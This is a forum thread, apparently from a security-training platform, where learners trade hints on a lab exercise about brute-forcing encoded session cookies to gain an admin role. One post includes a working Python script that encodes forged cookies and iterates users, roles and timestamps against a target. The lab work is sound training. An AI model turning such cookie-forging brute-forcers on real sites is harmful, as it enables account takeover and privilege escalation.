BROKEN AUTHENTICATION [academy]. Bruteforcing Cookies

I’m stuck on the “Bruteforcing Cookies” section at the first question.
I intercepted and decoded the cookies. Then I set up an attack in burp intruder (screenshot).


For the brute force, I generated Unix timestamps within ± 10 minutes of the intercepted cookie.
I changed the prefix. I’ve tried different usernames (htbuser, htbadmin, empty value) and different roles (admin, super user, superuser, sudo, su, empty value). But the server response is always the same.
Could someone give a hint on which direction to move in to solve this question?

You are correct to think that you have to try different values for role; I think you haven’t found the correct one to use there.


Thank you, I was moving in this direction and found the right role.

I’m stuck on the “Bruteforcing Cookies” section too.
I can’t get a flag for htbadmin trying different super-user roles like root, sudo, su, superuser, super user, admin, administrator, using the Python script from the section, filtering for the “HTB” flag string in the responses and brute-forcing the last 5 digits of the timestamp. I believe the cookie encoding flow is correct, as it has the same format as the cookie for user:htbuser with role:student, and I can see the discovered name and role in the responses.

Could somebody please hint at where I’m going wrong?

Is just fuzzing the roles enough, or should I fuzz the timestamp as you did?
I tried many different roles: admin, superuser, root, professor, dean, but nothing gave me the flag.

If you haven’t found the right value yet, then I’ll tell you that the timestamp is not important. Focus on the role; it’s something related to “super user”.

Can someone provide a hint here? I’m trying everything related to the role… nothing is working.

A wordlist from SecLists might help for brute-forcing the role.

Any idea which one? I’ve tried them all with no luck.

Probably wordlists containing “superuser” (or similar). If your wordlist still doesn’t work, you should double-check your code. Perhaps you missed a step in your encoding process, or you have a bug.

Watch out for newline (“\n”) in some wordlists, this will corrupt your payload.

Try to analyze your requests/responses using a proxy, Wireshark, tcpdump, …

Yeah I can’t find anything wrong with the cookies or encoding I’m using. When I brute force I output the cookie I develop to the screen and use a user and role that I KNOW will work…it’s one of the support users that I have got the password for. So I log in and copy the encoded cookie from the browser. Then I run my script to output the cookie I build for the same user and role - the browser cookie for that user and role and my coded cookie are identical, so I know my script works correctly. I just don’t seem to be able to find a working role.

Have you checked that there is no newline in your wordlist? Encoding with “\n” leads to different results… The server doesn’t strip the input…
That was one of my big issues (Thanks to burpsuite, I could find and fix it).

Yes, my code was fine… I completed it now… I didn’t have the correct users…

Hello,
I tried with the roles “root, sudo, su, superuser, admin, administrator, htbadmin and super user”.
With a lot of users: htbuser, htbadmin, user, superuser.
Nothing works. Can you help me, please?
Thx,

Read the Predictable Usernames section of the Bruteforcing Usernames page.

I am in need of some help here as well… I have two questions. The first is: how do I automate testing the cookies with the different levels of encoding needed? Do I need to modify the Python script, and if so, can someone help me as to how? I can do it manually using Burp Decoder or CyberChef, but I am sure there is a way to automate it… The second question is: what list should I be using? I tried all the superuser combinations listed in CommonAdminBase64.txt, but nothing seems to be giving me a flag… Thanks!

There are clues to the format of the usernames in that section. I scripted mine. I think there is a script in the materials they named something like automate_cookie_tampering.py. I modified a version of that to get it to work.

Burp Suite provides a method of automating encoding/encryption. It’s part of Intruder. Under the Payloads tab, look for Payload Processing.

You can add different encoding tasks to each payload before it gets sent.
-onthesauce
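For anyone who prefers scripting this instead of Burp’s Payload Processing, here is an added example (my own code, not the module’s automate_cookie_tampering.py and not onthesauce’s Burp setup) of the three things this thread keeps circling: building the cookie through an encoding chain, stripping the trailing newline from wordlist entries before it gets encoded, and walking a user/role/timestamp window against a target. The cookie layout (“user:…;role:…;ts:…”), the encoding chain (base64, then hex), the users, the role wordlist, the timestamp and the stand-in server are all assumptions I constructed so the script runs offline; swap COOKIE_FORMAT and the two chain functions for whatever your decoder shows, and pass a real HTTP request function as probe:

```python
import base64
from typing import Callable, Iterable, Iterator, Optional

# ASSUMED cookie layout and encoding chain (constructed for this example, not
# taken from the module): plaintext "user:<name>;role:<role>;ts:<unix ts>",
# base64-encoded and then hex-encoded. Replace these to match the real cookie.
COOKIE_FORMAT = "user:{user};role:{role};ts:{ts}"


def encode_chain(plain: str) -> str:
    """Apply the assumed encoding layers innermost first: base64, then hex."""
    b64 = base64.b64encode(plain.encode()).decode()
    return b64.encode().hex()


def decode_chain(cookie: str) -> str:
    """Reverse encode_chain: hex -> base64 -> plaintext."""
    return base64.b64decode(bytes.fromhex(cookie)).decode()


def build_cookie(user: str, role: str, ts: int) -> str:
    return encode_chain(COOKIE_FORMAT.format(user=user, role=role, ts=ts))


def load_wordlist(lines: Iterable[str]) -> list:
    """Normalise wordlist lines: strip the trailing newline/whitespace that
    would otherwise be encoded into the cookie, drop blanks and comments,
    and de-duplicate while keeping order."""
    seen, out = set(), []
    for raw in lines:
        word = raw.strip()
        if not word or word.startswith("#") or word in seen:
            continue
        seen.add(word)
        out.append(word)
    return out


def candidates(users, roles, ts_center: int, window: int = 0) -> Iterator[tuple]:
    """Yield (user, role, ts, cookie) for every combination. window=0 keeps the
    intercepted timestamp fixed; window=N also tries +/- N seconds around it."""
    for ts in range(ts_center - window, ts_center + window + 1):
        for user in users:
            for role in roles:
                yield user, role, ts, build_cookie(user, role, ts)


def brute_force(probe: Callable[[str], str], users, roles, ts_center: int,
                window: int = 0, marker: str = "HTB") -> Optional[tuple]:
    """Send each candidate cookie through probe() and return the first one whose
    response body contains marker (the flag prefix in a real run). probe is
    whatever issues the request, e.g. a wrapper around requests.get(...).text."""
    for user, role, ts, cookie in candidates(users, roles, ts_center, window):
        if marker in probe(cookie):
            return user, role, ts, cookie
    return None


# Constructed stand-in for the target (NOT the real application) so the demo
# runs offline: it grants access only to the made-up role below.
SECRET_ROLE = "siteowner"


def fake_server(cookie: str) -> str:
    try:
        plain = decode_chain(cookie)
    except ValueError:
        return "bad cookie"
    fields = dict(f.split(":", 1) for f in plain.split(";"))
    if fields.get("user") == "htbadmin" and fields.get("role") == SECRET_ROLE:
        return "Access granted"
    return "Access denied"


# Constructed sample of a role wordlist; real lists (e.g. from SecLists) carry
# trailing newlines, CRLF and duplicates, which load_wordlist removes.
WORDLIST = """# roles
admin
superuser
root

siteowner
admin
""".splitlines(keepends=True)


def demo() -> Optional[tuple]:
    roles = load_wordlist(WORDLIST)
    intercepted_ts = 1700000000  # constructed stand-in for the intercepted cookie's timestamp
    return brute_force(fake_server, ["htbuser", "htbadmin"], roles,
                       intercepted_ts, window=2, marker="Access granted")


if __name__ == "__main__":
    print(demo())
```

The newline point from earlier in the thread is visible here: build_cookie("htbadmin", "admin\n", ts) and build_cookie("htbadmin", "admin", ts) are different cookies, which is why the wordlist is passed through load_wordlist first. Against the real target, replace fake_server with a function that sends the cookie and returns the response body, and leave marker at the flag prefix.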

OK, I was on the right track then, hopefully. I was playing with that but was only encoding the “role” part of the payload. I couldn’t figure out how to encode the rest of the payload that I was not changing. So if I set multiple payload positions, use a pitchfork attack and just have the data stay static everywhere aside from the role (which I would use the wordlist on), maybe that would work? I am going to give it a try. I did read that section on predictable usernames a couple of times now; I’ll give it a fresh look and see if I can figure out what wordlist to use. I would love to learn how to script it as well, but I will try Burp first. Thanks for the help!

You can add a prefix and suffix to a list, and then further processing will encode the whole list.
